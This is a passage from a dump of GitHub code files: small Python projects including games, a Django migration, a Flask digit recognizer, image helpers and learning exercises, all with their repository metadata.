printed, separated by spaces. 
Each pair of sublists\r\n should be separated by a tab and on a separate line\r\n '''\r\n print ('Guesses \\tClues')\r\n index = 0\r\n while index <= len(clist2) and index < len(glist1):\r\n gstring = ''\r\n for i in glist1[index]:\r\n gstring = gstring + i + ' '\r\n cstring = ''\r\n for item in clist2[index]:\r\n cstring = cstring + item + ' '\r\n print (gstring,'\\t', cstring)\r\n index = index + 1","repo_name":"MUsamatariq27/mini-Projects","sub_path":"mastermindGame/mastermind.py","file_name":"mastermind.py","file_ext":"py","file_size_in_byte":3998,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"34039014132","text":"\"\"\"List of prime numbers generator.\"\"\"\n\"\"\"ENTER YOUR SOLUTION HERE!\"\"\"\n\ndef primes(number_of_primes):\n if number_of_primes <= 0:\n raise ValueError\n\n list = []\n num = 2\n while len(list) < number_of_primes:\n if isPrime(num):\n list.append(num)\n num += 1\n return list\n\ndef isPrime(n):\n if n == 2:\n return True\n for i in range(2, n):\n if n % i == 0:\n return False\n return True\n","repo_name":"KCL-SEG/list-of-primes-v2-Cassini-17","sub_path":"primes.py","file_name":"primes.py","file_ext":"py","file_size_in_byte":453,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"33243306891","text":"# encapsulando atributos con __\nclass Coche():\n def __init__(self):\n self.__largoChasis = 250\n self.__anchoChasis = 120\n self.__ruedas = 4\n self.__enMarcha = False\n\n def arrancar(self, arrancamos):\n self.__enMarcha = arrancamos\n if self.__enMarcha:\n return \"EL COCHE ESTÁ EN MARCHA\"\n else:\n return \"EL COCHE ESTÁ PARADO\"\n\n def estado(self):\n print(\"El coche tiene: \", self.__ruedas, \" ruedas\", \" un ancho de: \",\n self.__anchoChasis, \" y un largo de: \", self.__largoChasis)\n\n\nmiCoche = Coche()\nprint(miCoche.arrancar(False))\n# aqui vemos que no puede modificar el atributo\nmiCoche.__ruedas = 5\nmiCoche.estado()\n","repo_name":"Jorgefebres/python-tut-pildoras","sub_path":"encapsulamiento.py","file_name":"encapsulamiento.py","file_ext":"py","file_size_in_byte":712,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"71677984530","text":"# Created manually by mschrimpf to address a change that happened at some point before\n# https://github.com/brain-score/brain-score.web/pull/15 where the database model field `identifier` was renamed\n# (or originally named) to `name`.\n# Also address changed help text for `user.is_staff` in https://github.com/brain-score/brain-score.web/pull/69.\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n dependencies = [\n ('benchmarks', '0003_user_display_name'),\n ]\n\n operations = [\n migrations.RenameField(\n model_name='model',\n old_name='identifier',\n new_name='name',\n ),\n migrations.AlterField(\n model_name='model',\n name='name',\n field=models.CharField(max_length=200),\n ),\n migrations.AlterField(\n model_name='user',\n name='is_staff',\n field=models.BooleanField(default=False, help_text='Designates whether the user is a staff member.',\n verbose_name='staff status'),\n ),\n ]\n","repo_name":"brain-score/brain-score.web","sub_path":"benchmarks/migrations/0004_model_identifier_name.py","file_name":"0004_model_identifier_name.py","file_ext":"py","file_size_in_byte":1106,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} 
+{"seq_id":"36624418856","text":"import pygame \n\nclass Gui:\n def __init__(self):\n # Initialize Pygame\n pygame.init()\n # Colors\n self.BLACK = (0, 0, 0)\n self.WHITE = (255, 255, 255)\n self.GREEN = (60, 179, 113)\n self.YELLOW = (255, 255, 153)\n # Measurements for board spaces and disk pieces\n self.WIDTH = 55\n self.HEIGHT = 55\n self.MARGIN = 5\n self.RADIUS = 20\n self.SCREEN_SIZE = (485, 485)\n self.screen = pygame.display.set_mode(self.SCREEN_SIZE)\n pygame.display.set_caption(\"Othello Game\")\n \n def show_screen(self, state):\n \"\"\"Display the initial board.\"\"\"\n node = lambda x, y: \"%s\" % (state.board.get((x, y)))\n coordinates = [[node(x, y) for x in range(8)] for y in range(8)]\n self.screen.fill(self.BLACK)\n self.draw_board(coordinates)\n # Update the screen\n pygame.display.flip()\n\n def draw_board(self, board):\n for row in range(8):\n for col in range(8):\n x_coord = (self.MARGIN + self.WIDTH) * row + self.MARGIN\n y_coord = (self.MARGIN + self.HEIGHT) * col + self.MARGIN\n pygame.draw.rect(self.screen, self.GREEN, [x_coord, y_coord, self.WIDTH, self.HEIGHT])\n player = board[row][col]\n if player != None:\n self.draw_disk(player, row, col)\n\n def draw_disk(self, player, x, y):\n x_coord = (self.MARGIN + self.WIDTH) * x + self.MARGIN + 25\n y_coord = (self.MARGIN + self.HEIGHT) * y + self.MARGIN + 25\n if player == 'B':\n pygame.draw.circle(self.screen, self.BLACK, (x_coord, y_coord), self.RADIUS)\n elif player == 'W':\n pygame.draw.circle(self.screen, self.WHITE, (x_coord, y_coord), self.RADIUS)\n\n def get_mouse_event(self):\n \"\"\"Detect user clicks.\"\"\"\n done = False\n # Loop until user clicks close button\n while not done:\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n done = True\n elif event.type == pygame.MOUSEBUTTONDOWN:\n pos = pygame.mouse.get_pos()\n # Change x, y screen coordinates to grid coordinates\n column = pos[0] // (self.WIDTH + self.MARGIN)\n row = pos[1] // (self.HEIGHT + self.MARGIN)\n return (row, column)\n pygame.quit() \n\n def reset_square(self, pos):\n \"\"\"Reset squares back to original color.\"\"\"\n x = (self.MARGIN + self.WIDTH) * pos[0] + self.MARGIN\n y = (self.MARGIN + self.WIDTH) * pos[1] + self.MARGIN \n pygame.draw.rect(self.screen, self.GREEN, [x, y, self.WIDTH, self.HEIGHT])\n pygame.display.flip()\n\n def update(self, board):\n \"\"\"Update the screen.\"\"\"\n for i in range(8):\n for j in range(8):\n self.reset_square((j, i)) \n if board.get((i, j)) != None:\n self.draw_disk(board.get((i, j)), j, i) \n pygame.display.flip()\n \n def show_valid_moves(self, moves):\n \"\"\"Display valid squares current player can move to in yellow.\"\"\" \n for move in moves:\n x = (self.MARGIN + self.WIDTH) * move[1] + self.MARGIN\n y = (self.MARGIN + self.WIDTH) * move[0] + self.MARGIN\n pygame.draw.rect(self.screen, self.YELLOW, [x, y, self.WIDTH, self.HEIGHT])\n pygame.display.flip()\n \n def score(self, player):\n \"\"\"Display the score and keep the screen open until user closes it.\"\"\"\n done = False\n while not done:\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n done = True \n self.screen.fill(self.BLACK)\n font = pygame.font.SysFont('Arial', 20)\n if player == 'B':\n display = font.render(\"You won!\", True, self.WHITE)\n elif player == 'W':\n display = font.render(\"White won!\", True, self.WHITE)\n else:\n display = font.render(\"Tie!\", True, self.WHITE)\n self.screen.blit(display, \n display.get_rect(\n center=(self.screen.get_width()/2, self.screen.get_height()/2)))\n 
pygame.display.flip()\n pygame.quit()","repo_name":"pearllaw/Othello","sub_path":"interface.py","file_name":"interface.py","file_ext":"py","file_size_in_byte":4354,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"69999192852","text":"import numpy as np\nfrom skimage.draw import polygon_perimeter, line\nfrom shapely.geometry import Polygon\nfrom typing import Tuple, Optional\n\n\ndef _rotation(pts: np.ndarray, theta: float) -> np.ndarray:\n r = np.array([[np.cos(theta), -np.sin(theta)], [np.sin(theta), np.cos(theta)]])\n pts = pts @ r\n return pts\n\n\ndef _make_box_pts(\n pos_x: float, pos_y: float, yaw: float, dim_x: float, dim_y: float\n) -> np.ndarray:\n\n hx = dim_x / 2\n hy = dim_y / 2\n\n pts = np.asarray([(-hx, -hy), (-hx, hy), (hx, hy), (hx, -hy)])\n pts = _rotation(pts, yaw)\n pts += (pos_x, pos_y)\n return pts\n\n\ndef _make_spaceship(\n pos: np.asarray, yaw: float, scale: float, l2w: float, t2l: float\n) -> Tuple[np.ndarray, np.ndarray]:\n\n dim_x = scale\n dim_y = scale * l2w\n\n # spaceship\n x1 = (0, dim_y)\n x2 = (-dim_x / 2, 0)\n x3 = (0, dim_y * t2l)\n x4 = (dim_x / 2, 0)\n pts = np.asarray([x1, x2, x3, x4])\n pts[:, 1] -= dim_y / 2\n\n # rotation + translation\n pts = _rotation(pts, yaw)\n pts += pos\n\n # label\n # pos_y, pos_x, yaw, dim_x, dim_y\n params = np.asarray([*pos, yaw, dim_x, dim_y])\n\n return pts, params\n\n\ndef _get_pos(s: float) -> np.ndarray:\n return np.random.randint(10, s - 10, size=2)\n\n\ndef _get_yaw() -> float:\n return np.random.rand() * 2 * np.pi\n\n\ndef _get_size() -> int:\n return np.random.randint(18, 37)\n\n\ndef _get_l2w() -> float:\n return abs(np.random.normal(3 / 2, 0.2))\n\n\ndef _get_t2l() -> float:\n return abs(np.random.normal(1 / 3, 0.1))\n\n\ndef make_data(\n has_spaceship: bool = None,\n noise_level: float = 0.8,\n no_lines: int = 6,\n image_size: int = 200,\n) -> Tuple[np.ndarray, np.ndarray]:\n \"\"\" Data generator\n\n Args:\n has_spaceship (bool, optional): Whether a spaceship is included. Defaults to None (randomly sampled).\n noise_level (float, optional): Level of the background noise. Defaults to 0.8.\n no_lines (int, optional): No. of lines for line noise. Defaults to 6.\n image_size (int, optional): Size of generated image. 
Defaults to 200.\n\n Returns:\n Tuple[np.ndarray, np.ndarray]: Generated Image and the corresponding label\n The label parameters are x, y, yaw, x size, and y size respectively\n An empty array is returned when a spaceship is not included.\n \"\"\"\n\n if has_spaceship is None:\n has_spaceship = np.random.choice([True, False], p=(0.8, 0.2))\n\n img = np.zeros(shape=(image_size, image_size))\n label = np.full(5, np.nan)\n\n # draw ship\n if has_spaceship:\n\n params = (_get_pos(image_size), _get_yaw(), _get_size(), _get_l2w(), _get_t2l())\n pts, label = _make_spaceship(*params)\n\n rr, cc = polygon_perimeter(pts[:, 0], pts[:, 1])\n valid = (rr >= 0) & (rr < image_size) & (cc >= 0) & (cc < image_size)\n\n img[rr[valid], cc[valid]] = np.random.rand(np.sum(valid))\n\n # noise lines\n line_noise = np.zeros(shape=(image_size, image_size))\n for _ in range(no_lines):\n rr, cc = line(*np.random.randint(0, 200, size=4))\n line_noise[rr, cc] = np.random.rand(rr.size)\n\n # combined noise\n noise = noise_level * np.random.rand(image_size, image_size)\n img = np.stack([img, noise, line_noise], axis=0).max(axis=0)\n\n img = img.T # ensure image space matches with coordinate space\n\n return img, label\n\n\ndef score_iou(ypred: np.ndarray, ytrue: np.ndarray) -> Optional[float]:\n\n assert (\n ypred.size == ytrue.size == 5\n ), \"Inputs should have 5 parameters, use null array for empty predictions/labels.\"\n\n no_pred = np.any(np.isnan(ypred))\n no_label = np.any(np.isnan(ytrue))\n\n if no_label and no_pred:\n # true negative\n return None\n elif no_label and not no_pred:\n # false positive\n return 0\n elif not no_label and not no_pred:\n # true positive\n t = Polygon(_make_box_pts(*ytrue))\n p = Polygon(_make_box_pts(*ypred))\n iou = t.intersection(p).area / t.union(p).area\n return iou\n elif not no_label and no_pred:\n # false negative\n return 0\n else:\n raise NotImplementedError\n","repo_name":"jaymody/spaceship","sub_path":"helpers.py","file_name":"helpers.py","file_ext":"py","file_size_in_byte":4132,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"66"} +{"seq_id":"73785057809","text":"# Scraping github to extract user name and profile picture\n\nfrom bs4 import BeautifulSoup\nimport requests\n\nusername = input('Enter your github username: \\n')\ngithub_url = 'https://github.com/' + username\n\ndata_request = requests.get(github_url)\n\nsoup = BeautifulSoup(data_request.content, 'html.parser')\n\nprofile_picture = soup.find('img', {'style': 'height:auto;'})['src']\nuser_name = soup.find(class_='p-name').get_text()\n\nprint(user_name)\nprint(profile_picture)\n","repo_name":"femiteontop/WebScraping","sub_path":"WebScraping.py","file_name":"WebScraping.py","file_ext":"py","file_size_in_byte":465,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"66"} +{"seq_id":"23176899110","text":"def sort(x, l): # - сортировка элементов списка\n q = int() # - пустая целочисленная переменная(нужна для сохранения элемента, который будем менять местами с элементом сравнения)\n F = bool() # - пустая \"булева\" переменная\n for k in range(1,l): # - \n F = False\n for i in range(l-k):\n if x[i+1] < x[i]: # - сравнение двух соседних элементов\n q = x[i] # - присвоение пустой переменной наибольшего элемента для его сохранения.\n x[i] = x[i+1] # - сортировка элементов по убыванию (меньший элемент ставим на текущую позицию, больший на следующую)\n x[i+1] = q # - присвоение следующей позиции большего элемента\n F = True # - по 
окончанию сортировки двух соседних элементов переменной F присваивается значение True и вложенный цикл начинается сначала\n\t\t\t\t\t\t # - # - Далее, мы выходим из внутреннего цикла for и берём следующий интервал элементов. \n\t\t\t\t\t\t # - Если следующие два соседних элемента не удовлетворют условию if во вложенном цикле, то переменная F сохраняет значение False.\n if F == False: # - Таким образом мы проходим весь список два раза. Если бы был только один цикл, то элемент списка остался бы неотсортированным. После того, как все элементы отсортированы (внешний for закончил свою работу), F присваивает False, и мы выходим из внутреннего цикла \n break # - Затем, возвращаем конечное значение списка и выводим его на экран.\n return x\n\n\t\nx = list(map(int, input('Input elements: ').split( )))\nl = len(x)\n\nsort(x, l)\nprint(sort(x, l))\n","repo_name":"ElvisMongo/Mysnake","sub_path":"Home_task_6.py","file_name":"Home_task_6.py","file_ext":"py","file_size_in_byte":2446,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"71045213332","text":"from django.conf.urls import url\nfrom django.views.static import serve\nfrom django.conf import settings\nfrom . import views,upload\n\napp_name= 'app'\nurlpatterns = [\n url(r'^$',views.index,name='index'),\n url(r'^archive/$', views.archive, name='archive'),\n url(r'^category/$', views.category, name='category'),\n url(r'^article/$', views.article, name='article'),\n url(r'^tag/$', views.tag, name='tag'),\n url(r'uploads/(?P.*)', serve, {'document_root': settings.MEDIA_ROOT}),\n url(r'^admin/upload/(?P[^/]+)$', upload.upload_image, name='upload_image'),\n]","repo_name":"tinglinux/amaryllis","sub_path":"app/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":588,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"22030778813","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on 17-03-2019 at 02:52 PM\n\n@author: Vivek\n\"\"\"\n\n# Function returning multiple values of different data types\ndef someFunction():\n name = 'Alice'\n ID = 'EMP001'\n salary = 10000\n return name, ID, salary\n\nif __name__ == '__main__':\n # Multiple assignment\n x, y = 10, 20\n print('X:',x,'Y:',y)\n\n # Temporary tuple, pass-by-value assignment\n x, y = y, x\n print('X:', x, 'Y:', y)\n\n # String data type assignment\n x, y = 'OK'\n print('X:', x, 'Y:', y)\n\n # Multiple function return value assignment\n empName, empID, empSalary = someFunction()\n print('Name:', empName, ', ID:', empID, ', Salary:', empSalary)\n\n # Automatically unpacking elements of a list inside a loop\n list = [('Alice', 25), ('Bob', 30), ('Jake', 27), ('Barbara', 40)]\n for name, age in list:\n print(name, 'is aged', str(age))\n","repo_name":"VivekShri/PyProwess","sub_path":"examples/implicit-tuple-unpacking.py","file_name":"implicit-tuple-unpacking.py","file_ext":"py","file_size_in_byte":884,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"66"} +{"seq_id":"34129134580","text":"import pygame\nimport time\npygame.init()\npygame.font.init()\npygame.mixer.init()\npygame.mixer.pre_init(frequency=44100,size=-16,channels=2,buffer=512)\n#Nền\na=(800,600)\nscreen=pygame.display.set_mode(a)\npygame.display.set_caption('Quê Lúa Yên Thành')\nWHITE=(255,255,255)\nBLACK=(0,0,0)\nfont = pygame.font.Font('freesansbold.ttf', 32)\ndialogue_font = pygame.font.SysFont('utf8', 
32)\nrunning=True\nlanguage=0\nbg=pygame.image.load(('bg1.jpg'))\nbando=pygame.image.load(('map.png'))\nmenu=pygame.image.load(('menu.png'))\nhome=pygame.image.load(('home.png'))\nhome=pygame.transform.scale(home,(50,50))\ndichvu1=pygame.image.load(('amthuc.png'))\ndichvu1=pygame.transform.scale(dichvu1,a)\ndichvu2=pygame.image.load(('nghiduong.png'))\ndichvu2=pygame.transform.scale(dichvu2,a)\ndichvu3=pygame.image.load(('giaothong.png'))\ndichvu3=pygame.transform.scale(dichvu3,a)\nback1=pygame.image.load(('Back1.png'))\nback1=pygame.transform.scale(back1,(100,50))\nmuiten1=pygame.image.load(('arrowleft.png'))\nmuiten1=pygame.transform.scale(muiten1,(200,200))\nmuiten2=pygame.image.load(('arrowright.png'))\nmuiten2=pygame.transform.scale(muiten2,(200,200))\nx='bg'\ndichvu=0\n# các biến trong map\nlocation=0\ndencuong=0\ntruongbon=0\n#Đền Cuông\ndencuong1=pygame.image.load(('dencuong/ĐC1.jpeg'))\ndencuong1=pygame.transform.scale(dencuong1,a)\ndencuong2=pygame.image.load(('dencuong/ĐC2.jpeg'))\ndencuong2=pygame.transform.scale(dencuong2,a)\ndencuong3=pygame.image.load(('dencuong/ĐC3.jpeg'))\ndencuong3=pygame.transform.scale(dencuong3,a)\ndencuong4=pygame.image.load(('dencuong/ĐC4.jpeg'))\ndencuong4=pygame.transform.scale(dencuong4,a)\ndencuong5=pygame.image.load(('dencuong/ĐC6.jpeg'))\ndencuong5=pygame.transform.scale(dencuong5,a)\ndencuong6=pygame.image.load(('dencuong/ĐC7.jpeg'))\ndencuong6=pygame.transform.scale(dencuong6,a)\ndencuong7=pygame.image.load(('dencuong/ĐC8.jpeg'))\ndencuong7=pygame.transform.scale(dencuong7,a)\ndencuong8=pygame.image.load(('dencuong/ĐC9.jpeg'))\ndencuong8=pygame.transform.scale(dencuong8,a)\ndencuong9=pygame.image.load(('dencuong/ĐC10.jpeg'))\ndencuong9=pygame.transform.scale(dencuong9,a)\n#Truông Bồn\ntruongbonbg_sound=pygame.mixer.Sound('truongbon/bg.mp3')\ntruongbonbg=pygame.image.load(('truongbon/bg.png'))\ntruongbonbg=pygame.transform.scale(truongbonbg,a)\n#Main\nwhile running:\n\tmouse_x,mouse_y=pygame.mouse.get_pos()\n\tprint(mouse_x,mouse_y,x,location)\n\tscreen.blit(bg,(0,0))\n\t#Tương tác\n\tfor event in pygame.event.get():\n\t\tif event.type==pygame.QUIT:\n\t\t\trunning=False\n\t\tif event.type==pygame.MOUSEBUTTONDOWN:\n\t\t\tif event.button==1:\n\t\t\t#Menu\n\t\t\t\tif (mouse_x>260 and mouse_x<522) and (mouse_y>320 and mouse_y<400) and x=='bg':\n\t\t\t\t\tx='menu'\n\t\t\t\t\tbreak\n\t\t\t#Nút Home\n\t\t\t\tif (mouse_x>0 and mouse_x<45) and (mouse_y>0 and mouse_y<50):\n\t\t\t\t\tx='bg'\n\t\t\t#Dịch vụ\n\t\t\t\tif (mouse_x>259 and mouse_x<525) and (mouse_y>345 and mouse_x<435) and x=='menu':\n\t\t\t\t\tx='dichvu'\n\t\t\t\tif x=='dichvu':\n\t\t\t\t\tif (mouse_x>50 and mouse_x<255) and (mouse_y>10 and mouse_y<100):\n\t\t\t\t\t\tdichvu-=1\n\t\t\t\t\t\tif dichvu<0:\n\t\t\t\t\t\t\tdichvu=0\n\t\t\t\t\telif (mouse_x>550 and mouse_x<755) and (mouse_y>10 and mouse_y<100):\n\t\t\t\t\t\tdichvu+=1\n\t\t\t\t\t\tif dichvu>2:\n\t\t\t\t\t\t\tdichvu=2\n\t\t\t\t\telif (mouse_x>700 and mouse_x<800) and (mouse_y>555 and mouse_y<600):\n\t\t\t\t\t\tx='menu'\n\t\t\t#Bản đồ \n\t\t\t\tif (mouse_x>250 and mouse_x<525) and (mouse_y>168 and mouse_y<262) and x=='menu':\n\t\t\t\t\tx='bando'\n\t\t\t\t#Chọn địa điểm\n\t\t\t\tif x=='bando':\n\t\t\t\t\tif(mouse_x>617 and mouse_x<660) and (mouse_y>368 and mouse_y<408):\n\t\t\t\t\t\tlocation='dencuong'\n\t\t\t\t\t\tx=0\n\t\t\t\t\t\tdencuong=0\n\t\t\t\t\tif(54520 and mouse_x<140) and (118:\n\t\t\t\t\t\t\tdencuong=8\n\t\t\t\tif (mouse_x>0 and mouse_x<100) and (mouse_y>555 and mouse_y<600) and location 
!=0:\n\t\t\t\t\tlocation=0\n\t\t\t\t\tx='bando'\n#Chuyển Phông Nền\n\tif x=='bg':\n\t\tscreen.blit(bg,(0,0))\n\telif x=='menu':\n\t\tscreen.blit(menu,(0,0))\n\telif x=='bando':\n\t\tscreen.blit(bando,(0,0))\n\t\ttruongbonbg_sound.stop()\n\telif x=='dichvu':\n\t\tif dichvu==0:\n\t\t\tscreen.blit(dichvu1,(0,0))\n\t\tif dichvu==1:\n\t\t\tscreen.blit(dichvu2,(0,0))\n\t\tif dichvu==2:\n\t\t\tscreen.blit(dichvu3,(0,0))\n\t\tscreen.blit(back1,(700,555))\n\tif x!='bg':\n\t\tscreen.blit(home,(0,0))\n#Bản đồ\n\t#Đền Cuông\n\tif location=='dencuong':\n\t\tif dencuong==0:\n\t\t\tscreen.blit(dencuong1,(0,0))\n\t\tif dencuong==1:\n\t\t\tscreen.blit(dencuong2,(0,0))\n\t\tif dencuong==2:\n\t\t\tscreen.blit(dencuong3,(0,0))\n\t\tif dencuong==3:\n\t\t\tscreen.blit(dencuong4,(0,0))\n\t\tif dencuong==4:\n\t\t\tscreen.blit(dencuong5,(0,0))\n\t\tif dencuong==5:\n\t\t\tscreen.blit(dencuong6,(0,0))\n\t\tif dencuong==6:\n\t\t\tscreen.blit(dencuong7,(0,0))\n\t\tif dencuong==7:\n\t\t\tscreen.blit(dencuong8,(0,0))\n\t\tif dencuong==8:\n\t\t\tscreen.blit(dencuong9,(0,0))\n\t\tscreen.blit(muiten1,(-20,-40))\n\t\tscreen.blit(muiten2,(620,-40))\n\t\tscreen.blit(back1,(0,555))\n\tif location=='truongbon':\n\t\tscreen.blit(truongbonbg,(0,0))\n\t\ttruongbonbg_sound.play()\n\t\tscreen.blit(back1,(0,555))\n\tpygame.display.flip()\npygame.quit()","repo_name":"DuyAn4648/project","sub_path":"project.py","file_name":"project.py","file_ext":"py","file_size_in_byte":5205,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"4055873466","text":"import logging\r\nimport os\r\nimport pickle\r\n\r\nimport cv2\r\nimport sklearn\r\nimport matplotlib\r\nimport numpy as np\r\nmatplotlib.use('Agg')\r\nimport tensorflow\r\nimport tensorflow_hub as hub\r\nfrom flask import Flask, render_template, request, send_from_directory, url_for\r\nfrom PIL import Image\r\nfrom tensorflow.keras.models import load_model\r\nfrom tensorflow.keras.preprocessing import image\r\nfrom utils import grab_contours, sort_contours, label_contour, resize_image\r\nimport matplotlib.pyplot as plt\r\n\r\nplt.axis(\"off\")\r\n\r\n# Kernel for OpenCV morphological operations\r\nkernel = np.ones((1,1),np.uint8)\r\n\r\n# Disable Tensorflow warnings\r\nlogging.disable(logging.WARNING)\r\nos.environ[\"TF_CPP_MIN_LOG_LEVEL\"] = \"3\"\r\n\r\n# Folder to store images\r\nIMAGE_FOLDER = 'static/images'\r\n\r\napp = Flask(__name__)\r\napp.config['IMAGE_FOLDER'] = IMAGE_FOLDER\r\n\r\n# Set Tensorflow to use CPU\r\ntensorflow.config.set_visible_devices([], 'GPU')\r\n\r\n# Load the model\r\nmodel = load_model(\"model/model.h5\")\r\n\r\n# Home Page\r\n@app.route('/')\r\ndef index():\r\n return render_template('index.html')\r\n\r\n# Prediction page\r\n@app.route('/predict', methods=['GET', 'POST'])\r\ndef upload():\r\n if request.method == \"POST\":\r\n f = request.files[\"image\"]\r\n filepath = (f.filename)\r\n # Save the image\r\n f.save(os.path.join(app.config['IMAGE_FOLDER'], filepath))\r\n\r\n upload_img = os.path.join(IMAGE_FOLDER, filepath)\r\n\r\n image = cv2.imread(upload_img) # Read the image\r\n gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY) # Convert to grayscale\r\n gray = cv2.GaussianBlur(gray, (3, 3), 0) # Noise Removal\r\n edged = cv2.Canny(gray, 40, 120) # Detect edges\r\n \r\n # Isolate individual digits\r\n cnts = cv2.findContours(edged.copy(), cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)[-2:]\r\n cnts = grab_contours(cnts)\r\n\r\n if cnts == (): # If no digits detected\r\n predictions = ['None']\r\n bbox_path = 
upload_img\r\n else:\r\n cnts = sort_contours(cnts, method='left-to-right')[0]\r\n \r\n extracted_digits = []\r\n i = 0\r\n # Loop over the detected contours\r\n for c in cnts:\r\n # Compute bounding box of the contour\r\n (x, y, w, h) = cv2.boundingRect(c)\r\n cv2.rectangle(image, (x, y), (x+w, y+h), color=(0, 255, 0), thickness=2) \r\n\r\n # Filter extracted bounding boxes based on size criteria to avoid processing unwanted contours\r\n if (w >= 5 and w <= 150) and (h >= 15 and h <= 120):\r\n i += 1 \r\n # Extract the character\r\n roi = gray[y:y + h, x:x + w]\r\n \r\n # Perform image inverting it to make the digit appear as *white* (foreground) on a *black* background\r\n thresh = cv2.bitwise_not(roi)\r\n \r\n # Resize the image to 28x28 pixels\r\n thresh = resize_image(thresh) \r\n \r\n # Noise removal before feeding to the model\r\n thresh = cv2.medianBlur(thresh, 3)\r\n thresh = cv2.GaussianBlur(thresh, (3,3), 0)\r\n thresh = cv2.morphologyEx(thresh, cv2.MORPH_OPEN, kernel)\r\n \r\n # Normalize pixel values between 0 and 1\r\n thresh = thresh / 255.0\r\n \r\n plt.imshow(thresh, cmap='gray')\r\n plt.savefig('static/images/digits/digit_' + str(i))\r\n \r\n # Add to list of extracted individual digits\r\n extracted_digits.append(thresh)\r\n\r\n # Plot uploaded image with bounding boxes around individual digits\r\n bbox_path = os.path.join(app.config['IMAGE_FOLDER'], 'bbox.png')\r\n plt.imshow(image, cmap = 'gray')\r\n plt.savefig(bbox_path)\r\n\r\n \r\n # Make predictions on the extracted digits and display the output\r\n predictions = []\r\n if len(extracted_digits) == 0:\r\n predictions = ['None']\r\n bbox_path = upload_img\r\n else:\r\n extracted_digits = np.array(extracted_digits)\r\n predictions = model.predict(extracted_digits)\r\n predictions = np.argmax(predictions, axis=1)\r\n \r\n return render_template('predict.html', num=predictions, img_path = bbox_path)\r\n\r\n\r\nif __name__ == '__main__':\r\n app.run(debug=True, threaded=False)","repo_name":"IBM-EPBL/IBM-Project-10449-1659180179","sub_path":"Project Development Phase/Sprint 4/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":4662,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"2843269736","text":"import cv2\nimport math\nimport numpy as np\n\nWHITE = (255, 255, 255)\nYELLOW = (0, 255, 255)\nRED = (0, 0, 255)\nGREEN = (0, 255, 0)\nBLACK = (0, 0, 0)\nPI = 3.14\nWAIT_TIME = 1000\nHOLES = [(240, 136),\n (942, 136),\n (1684, 136),\n (1684, 802),\n (942, 814),\n (240, 798)]\nLINE_THICKNESS = 4\nGHOST_SIZE = 25\n\n\ndef pre_processing(frame, threshold1, threshold2, k=3):\n frame_processed = cv2.GaussianBlur(frame, (5, 5), 3)\n frame_processed = cv2.Canny(frame_processed, threshold1, threshold2)\n kernel = np.ones((k, k), np.uint8)\n frame_processed = cv2.dilate(frame_processed, kernel, iterations=1)\n frame_processed = cv2.morphologyEx(frame_processed, cv2.MORPH_CLOSE, kernel)\n return frame_processed\n\n\ndef find_contours(img, imgPre, minArea=1000, sort=True, filter=0, drawCon=False, c=(0, 255, 0)):\n \"\"\"\n Finds Contours in an image\n :param img: Image on which we want to draw\n :param imgPre: Image on which we want to find contours\n :param minArea: Minimum Area to detect as valid contour\n :param sort: True will sort the contours by area (biggest first)\n :param filter: Filters based on the corner points e.g. 
4 = Rectangle or square\n :param drawCon: draw contours boolean\n :return: Foudn contours with [contours, Area, BoundingBox, Center]\n \"\"\"\n conFound = []\n imgContours = img.copy()\n contours, hierarchy = cv2.findContours(imgPre, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)\n\n for cnt in contours:\n area = cv2.contourArea(cnt)\n\n if area > minArea:\n peri = cv2.arcLength(cnt, True)\n approx = cv2.approxPolyDP(cnt, 0.02 * peri, True)\n if len(approx) == filter or filter == 0:\n x, y, w, h = cv2.boundingRect(approx)\n cx, cy = x + (w // 2), y + (h // 2)\n if drawCon:\n cv2.drawContours(imgContours, cnt, -1, c, 3)\n cv2.rectangle(imgContours, (x, y), (x + w, y + h), c, 2)\n cv2.circle(imgContours, (x + (w // 2), y + (h // 2)), 5, c, cv2.FILLED)\n cv2.putText(imgContours, str(area), (x + (w // 2), y + (h // 2)), cv2.FONT_HERSHEY_SIMPLEX, 1,\n (255, 0, 0), 2)\n conFound.append({\"cnt\": cnt, \"area\": area, \"bbox\": [x, y, w, h], \"center\": [cx, cy]})\n\n if sort:\n conFound = sorted(conFound, key=lambda x: x[\"area\"], reverse=True)\n\n return imgContours, conFound\n\n\ndef calculate_projection(x1, y1, x2, y2, length):\n length_AB = ((x2 - x1) ** 2 + (y2 - y1) ** 2)\n x3 = int(x2 + (x2 - x1) / int(length_AB) * length)\n y3 = int(y2 + (y2 - y1) / int(length_AB) * length)\n\n return x3, y3\n\n\ndef draw_contour(img, x, y, w, h, i=100):\n cv2.rectangle(img, (x, y), (x + w, y + h), RED, 2)\n cv2.circle(img, (x + (w // 2), y + (h // 2)), 5, RED, cv2.FILLED)\n cv2.circle(img, (x + (w // 2), y + (h // 2)), 25, RED, 1)\n if i != 100:\n cv2.putText(img, str(i), (x, y), cv2.FONT_HERSHEY_SIMPLEX, 1, WHITE, 2)\n\n\n# Check if any hole is hit by calculating if is\n# inside one another\ndef result(frame, x, y, radius=35):\n inside = 0\n for hole in 